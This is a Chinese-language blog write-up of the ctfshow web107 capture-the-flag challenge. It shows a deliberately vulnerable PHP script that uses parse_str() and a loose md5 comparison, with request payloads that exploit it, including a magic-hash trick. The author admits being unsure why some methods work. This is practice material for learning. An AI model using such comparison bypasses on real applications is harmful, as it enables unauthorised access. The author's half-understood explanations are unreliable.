ctfshow-web107(php特性)

最新推荐文章于 2024-04-04 17:59:26 发布
最新推荐文章于 2024-04-04 17:59:26 发布
阅读量530 收藏
点赞数
分类专栏: php代码 文章标签: php 开发语言 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62094846/article/details/122524668
版权

parse_str() 函数把查询字符串解析到变量中。(以数组的方式)

注释:如果未设置 array 参数,由该函数设置的变量将覆盖已存在的同名变量。

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-28 23:24:14

*/


highlight_file(__FILE__);
error_reporting(0);
include("flag.php");

if(isset($_POST['v1'])){
    $v1 = $_POST['v1'];
    $v3 = $_GET['v3'];
       parse_str($v1,$v2);
       if($v2['flag']==md5($v3)){
           echo $flag;
       }

}



?>

法一:

$v2['flag']==md5($v3)

v2[]数组中是flag对应的值和v3的md5加密后的值进行比较,所以一定要让v1=flag  传参

GET
?v3=1

POST
v1=flag=c4ca4238a0b923820dcc509a6f75849b

法二:

GET
?v3[]=1

POST
v1=

md5无法解析数组,会null,这时如果v2['flag']也为空就可以执行下去,但是v1一定要传才能判断下面的语句

v1=c4ca4238a0b923820dcc509a6f75849b

但是这样不知道为什么不行,v2['flag']应该也是空的,但是没用

法三:

GET
?v3=240610708

POST
v1=flag=0

不知道是为什么

m0_62094846
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
ctfshow web189 无单引号,利用回显不同,盲注
10-21
ctfshow web189 无单引号,利用回显不同,盲注
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
ctfshow web入门 php特性 web89--web107
最新发布
2301_81040377的博客
04-04 1669
for循环里面的意思是取随机数1到36之间一个数,1到37之间一个数,1到38一个数,直到1到877,然后把每次拿到的随机数追加到allow数组里面。//如果GET传参flag的值=flag则将cookie的值代替flag中的值。//如果使用GET传参,则使用POST传参来代替。//如果GET传参HTTP_FLAG的值为flag则输出$flag。=b,但是md5编码之后又要相等。
CTFShow-周末大挑战parse-url篇Writeup
05-19
CTFShow--周末大挑战parse_url篇Writeup
ctfshow-VIP题目-Web-详细解题思路
01-27
ctfshow-VIP题目-Web-详细解题思路
ctfshow web入门 web103-web107
m0_62207170的博客
08-23 527
ctfshow web入门 web103-web107
CTFshow php特性 web107
Kradress的博客
12-14 293
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-28 23:24:14 */ highlight_file(__FILE__); error_reporting(0); include("flag.php"); if(isset($_P
php特性
weixin_74427106的博客
03-30 188
函数parse_str在这里的作用就是将v1的值给v2相当于v1=v2=flag=md5[v3]
CTFSHOW PHP特性篇(上篇 89-110
羽的博客
10-21 5501
web89 if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } 考察点:数组绕过正则表达式 官方文档中如下介绍 返回值 返回完整匹配次数(可能是0),或者如果发生错误返回FALSE。 也就是说如果我们不按规定传一个字符串,
最全CTF Web题思路总结(更新ing)
热门推荐
yjprolus的博客
02-12 4万+
个人向CTF Web题思路总结笔记
ctfshow web102-107
akxnxbshai的博客
01-26 3178
目录 Web 102-103 web 104 Web 105 Web 106 Web 107 Web 102-103 substr() 函数返回字符串的一部分 此题中v2被去掉了前两位字符所以到时候给v2前加两个数字 call_user_func函数 php5下is_numeric可识别16进制,如0x2e,然后调用hex2bin转成字符串写入木马,但题目环境没配好,是php7,所以要另换方法。 用伪协议写入,所以需要base64编码后转成16进制全是数字的字符串 &lt
ctfshow-web41~60-WP
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP
Web前端第二季(CSS):二:106-书写css代码的三种方式+107-css语法-选择器+108-选择器的变形
qq_40544338的博客
10-26 89
一.目的 1.想:学习前端知识 2.想:记录笔记,下次不用看视频,直接看笔记就可以快速回忆。 二.参考 1.我自己代码的GitHub网址 ​​​​​GitHub - xzy506670541/WebTest: SIKI学院的Web前端 1.SIKI学院:我参考此视频实操 Web前端第二季(CSS) - SiKi学院 - 生命不息,学习不止! 我参考此视频实操 1.w3school官网:当做字典使用 w3school 在线教程 1.菜鸟教程:当做字典使用 菜鸟...
ctfshow-web入门-php特性
qq_43618536的博客
07-11 1248
ctfshow-web入门-php特性
ctfshow 105-127
weixin_58519918的博客
06-15 684
wu
【ctfshow】PHP特性2
qq_61109509的博客
02-20 842
目录 web100 web101 web102 web103 web104 web105 web106 web107 web108 web109 web110 web100 include("ctfshow.php"); //flag in class ctfshow; $ctfshow = new ctfshow(); $v1=$_GET['v1']; $v2=$_GET['v2']; $v3=$_GET['v3']; $v0=is_numeric($...
CTFshow web入门——php特性
小元砸的博客
02-20 5246
Web 89 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } }
ctfshow web入门 web57
lonmar的博客
11-24 1117
文章目录0x010x020x03 看wp分析一波 只要凑出36即可 0x01 shell中各种括号()、(())、[]、[[]]、{}的作用和区别 : https://blog.csdn.net/qq_46091464/article/details/108563368 ${_}:代表上一次命令执行的结果 $(()): 做运算 0x02 之前没有命令返回或者执行,结果应该是空,与""等价 又 $((""))值为0,$((~$((""))))值为-1,再做拼接: 所以可以拼接得到-37 , -37
ctfshow web入门 PHP特性中篇(web105-web132)
ccfly1012的博客
09-11 1339
目录 web105 web106 web107 web108 web109 web110 web111 web112 web113 web114 web115 web123 web125 web126 web127 web128 web129 web130 web131 web132 web105 <?php ​ /* # -*- coding: utf-8 -*- # @Author: Firebasky # @Date: 2020-09-16 1
ctfshow-web-web红包题
07-14
ctfshow-web-web红包题是一道CTF比赛中的网络安全题目。这道题目的背景是一个在线购物网站,要求我们通过安全漏洞来获得网站的红包。 首先,我们可以检查网站的源代码,寻找可能存在的漏洞。在网站的前端页面中,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值